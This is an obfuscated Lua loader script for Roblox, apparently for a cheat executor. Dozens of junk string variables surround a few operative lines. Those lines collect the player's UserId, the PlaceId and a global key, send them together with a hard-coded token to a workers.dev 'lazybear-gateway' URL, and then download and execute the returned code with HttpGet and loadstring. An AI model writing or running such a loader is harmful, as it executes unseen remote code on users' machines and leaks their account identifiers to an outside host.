local wotlmzrhhxarp = "sd5rtpw76x2e2kass"
local mixgjbifpgch = "uvi5vijp2smlalc7"
local xccjzwnoksvov = "ma1bqdsb7o7ayvsm"
local evbwcwiqforhw = "wynu6xeq37"
local qhfyageajqq = "sytd24n42c477up"
local chazprvss = "1luf9epwq3sk"
local xnbghveivr = "xqzuo0ijhfzcv"
local qszeejbyg = "2ie1tuao8jx"
local yqpuoaogl = "5reenzjs5qj79"
local frwhbooikjxhxm = "p7d0g4kl9g"
local kadcxjaj = "c5o125g377m2nve"
local czcozarrehm = "0t07o85dery8eelex"
local kotdumgg = "i5455dtgfp6lcs"
local qtjopgakqdg = "5rti6estbveq"
if _G["6777777"] ~= true then return end
local mnjosyhi = "ogu7nvzk447xi5df"
local hxejpray = "fj9b2h9bnf6w"
local aypzvvtbjkz = "epthfocfogx69"
local gkegtebesfaxe = "re3z7hzlo55ts"
local ufozbanwk = "fg1mffoc80oinkr4"
local cgkcuofwol = "bao3103s2y951ov"
local szdezwnjskp = "og9j2x3s7dlnp"
local jlrdhvmqy = "ropjdcq7sbec"
local vjbigfbyytqhsr = "xvktyzeb82"
local irbheggicuv = "gwg8njngocgm6dp4"
local cfogpjyq = "bulcvvuv8l"
local zzmrpmlt = "u5bmzmrero57"
local zrnudfqko = "q59fw2my2x8j72"
local muxztnpkw = "ye4i1fw8955"
_G["vjfsdocvw"] = "zi5d8vbxnbglqjy3bl5j"
_G["__ls_reached_redirect"] = true
local mbpptsalbpe = "kqgtqb05bnmiqft"
local tkwqfnfupuu = "p2fjp9nvo2"
local ynqreqdzowpmp = "mufskl1t1d"
local uoatjxzi = "cpu832t6tgl"
local lsegazlx = "vd2bcvtckvx9eb3c"
local wldlszlzc = "91vvq4z13d0"
local ucnamtaxu = "1nrmykyuy3sb0vn2"
local jpagqvdh = "a8348bcy5xfwh"
local zejpmxuhtstzdg = "vf1n16y7j235n3hysk"
local lpxsrjsadsbyy = "i5fc0k45wom"
local ndbfndksc = "tvoq5qsw7yjh04zqh"
local asxcnfzf = "r9od7l8wf5qtlwdbui"
local ytopgjfwy = "h4lnn6jm6ztxdksgxf"
local wmtxgqtswgrkzg = "1rdxo06w4koymu4"
local olxazyig = "isn957zs4bzt0rnf4"
local dmwiazlyn = "db8ynesypjqcmmumo6"
local ajqsovqtckjo = "jvp7x7fwig2xquyb"
local afqpdxldle = tostring(_G["Key"] or "")
_G["wlaquvwpfz"] = auth
local oyibepsspbzx = tostring(game:GetService("Players").LocalPlayer.UserId)
local pztdzgxpcrrls = tostring(game.PlaceId)
local ldylhiszledobw = "https://lazybear-gateway.iusemaybehook.workers.dev/?file=lazybear0340_6767.lua&token=TuG8Qo7kykfYdp238XIPbthIG-3in_a-4v7wp10Bjvc&ck=" .. ajqsovqtckjo .. "&sv=zi5d8vbxnbglqjy3bl5j&uid=" .. oyibepsspbzx .. "&pid=" .. pztdzgxpcrrls .. "&key=" .. afqpdxldle .. "&hwid=" .. oyibepsspbzx
local uofpykgv = game:HttpGet(ldylhiszledobw, true)
if not uofpykgv or uofpykgv == "" then return end
local _fn, _err = loadstring(uofpykgv)
if not _fn then return end
_fn()
_G["wlaquvwpfz"] = nil
